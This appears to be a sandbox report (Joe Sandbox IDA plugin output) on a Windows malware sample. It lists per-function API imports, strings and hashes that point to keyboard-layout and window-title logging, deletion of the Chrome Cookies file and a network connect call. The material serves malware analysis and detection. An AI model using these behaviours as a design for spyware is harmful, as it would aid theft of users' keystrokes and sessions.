                                                • Instruction Fuzzy Hash: 4041517280010ABBDB00EFA4DD5E9DE3B78FB15305F148176F502A21A1EB799F54CB99
                                                APIs
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F90E
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6C995E04), ref: 0040F929
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F93A
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0040F94A
                                                  • Part of subcall function 0040F50A: GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040F53C
                                                  • Part of subcall function 0040F50A: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040F550
                                                  • Part of subcall function 0040F50A: GetProcAddress.KERNEL32(00000000), ref: 0040F557
                                                  • Part of subcall function 0040F50A: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F573
                                                  • Part of subcall function 0040F50A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419E78), ref: 0040F5B0
                                                  • Part of subcall function 0040F50A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7B2
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F96B
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0040F979
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 0040F98C
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 0040F99F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA5A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA63
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@AddressGdiplusLibraryLoadProcStartupV01@@V12@
                                                • String ID:
                                                • API String ID: 1942891133-0
                                                • Opcode ID: f2933705df77b0e2cc4e1a4fd4c52bb1d0334aa9faa4d24cd1d278faf23e96bc
                                                • Instruction ID: ecf60d155a116e3c2cc7972ff90b6a831e97ece962ed6d78678408e1aaa902ca
                                                • Opcode Fuzzy Hash: f2933705df77b0e2cc4e1a4fd4c52bb1d0334aa9faa4d24cd1d278faf23e96bc
                                                • Instruction Fuzzy Hash: 91415D36800208AFCF11AFE4DC59AEC7F75FF19301F048076E952B61A2EB395A19DB19
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D841
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D84C
                                                  • Part of subcall function 00411A24: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A3E
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D88E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D8A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040D8B3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8C3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8D3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8E3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8ED
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040D907
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D913
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D91F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D92B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D937
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D943
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                                • String ID:
                                                • API String ID: 3751107300-0
                                                • Opcode ID: 526eef5d35fd45c513a6e802abff52db5288f3278a7a7a24ec9274a9bf42a7c8
                                                • Instruction ID: 4ed70ea5339a062afd801ee0b40d05d60a16ddb86cab22ed749d3ee612a63b80
                                                • Opcode Fuzzy Hash: 526eef5d35fd45c513a6e802abff52db5288f3278a7a7a24ec9274a9bf42a7c8
                                                • Instruction Fuzzy Hash: 0A313E7280011A9BCB04BBA1DD5E9DF777CEB55305F0081BAF106E30A1EE789B488F59
                                                APIs
                                                • getenv.MSVCRT ref: 00406526
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406531
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040653C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406547
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406550
                                                • DeleteFileA.KERNEL32(00000000), ref: 00406557
                                                • GetLastError.KERNEL32 ref: 00406561
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 00406582
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00406595
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 004065BB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004065D0
                                                Strings
                                                • UserProfile, xrefs: 00406521
                                                • [Chrome Cookies found, cleared!], xrefs: 004065B6
                                                • [Chrome Cookies not found], xrefs: 0040657D
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040651B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 3740952235-304995407
                                                • Opcode ID: 423b4a1d3d8974d23b5f632d54bb964bfc9f694fcf3f9d77df3e111937160552
                                                • Instruction ID: 568e214f5b20e8abe362b83e159d7df5a4ee18145c0e93773571f910f025de9b
                                                • Opcode Fuzzy Hash: 423b4a1d3d8974d23b5f632d54bb964bfc9f694fcf3f9d77df3e111937160552
                                                • Instruction Fuzzy Hash: CF115175640104ABCB00BFA4ED1AAEE7738EB05702F104076E403F21D0EE395B08CBAA
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                • printf.MSVCRT ref: 00410D56
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                • String ID: %02i:%02i:%02i:%03i $_E@
                                                • API String ID: 4249031962-1872662220
                                                • Opcode ID: 88925dc55fceafaa061dd905c36b120111623d63b4ade33133887d420b503e76
                                                • Instruction ID: 650f22449e15c5f6a49693175b54c46cd3b0f1625fb81580e18968f425ed9705
                                                • Opcode Fuzzy Hash: 88925dc55fceafaa061dd905c36b120111623d63b4ade33133887d420b503e76
                                                • Instruction Fuzzy Hash: 4B11CEB6800119ABCF01EFE0DC59DEF777CBE14706B044166F512E2091EA78D759C7A8
                                                APIs
                                                  • Part of subcall function 00401F9B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401FA9
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00404BC1
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404BD6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00404BE2
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00404C06
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404C1C
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404C25
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00404C3A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404C44
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288), ref: 00404C70
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00404C90
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404C7A
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288), ref: 00404CB1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404CBB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00404CD1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404CE2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404CED
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00419288), ref: 00404D02
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                                • String ID:
                                                • API String ID: 257471410-0
                                                • Opcode ID: 7b2294950e61d3f105e2f52e542c652049d63aa2cdc1038fb8fcc5566dbc509b
                                                • Instruction ID: 6d36a47553fca4f1c2b8c1de80748eac5c045593e47cdd233237ecb5b217b3ab
                                                • Opcode Fuzzy Hash: 7b2294950e61d3f105e2f52e542c652049d63aa2cdc1038fb8fcc5566dbc509b
                                                • Instruction Fuzzy Hash: 58413372940109ABDB04FBA0ED5A9EE7738AB14305F14417EF902B31D2EB785F48CB99
                                                APIs
                                                • GetForegroundWindow.USER32(?,00419BC8,?,?,?,?,?,?,?,?,0040479C), ref: 00411B1C
                                                • GetWindowTextLengthA.USER32(00000000), ref: 00411B25
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411B3E
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B47
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B51
                                                • GetWindowTextA.USER32(00000000,00000000), ref: 00411B59
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B68
                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B72
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B7C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004139EC,?,00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B93
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411BA2
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00411BD3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411BFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411C07
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C1C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411C4D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411C56
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                                • String ID:
                                                • API String ID: 3496238640-0
                                                • Opcode ID: 22fecc47be34c029da223a2c64e9df4d5a4e4396a9d7b6a97e03657b32791b24
                                                • Instruction ID: 97b51a4b8bf0942ac0b259d29a5eb31fefd9abc9c50281e5236a5333084e9804
                                                • Opcode Fuzzy Hash: 22fecc47be34c029da223a2c64e9df4d5a4e4396a9d7b6a97e03657b32791b24
                                                • Instruction Fuzzy Hash: 0D412C355000099BCB04EFA5DD5A9FE7BB8FB14306B104169E913A21E0EF349F49CBA9
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00414970), ref: 0040D4AE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002), ref: 0040D4D5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D4E8
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D503
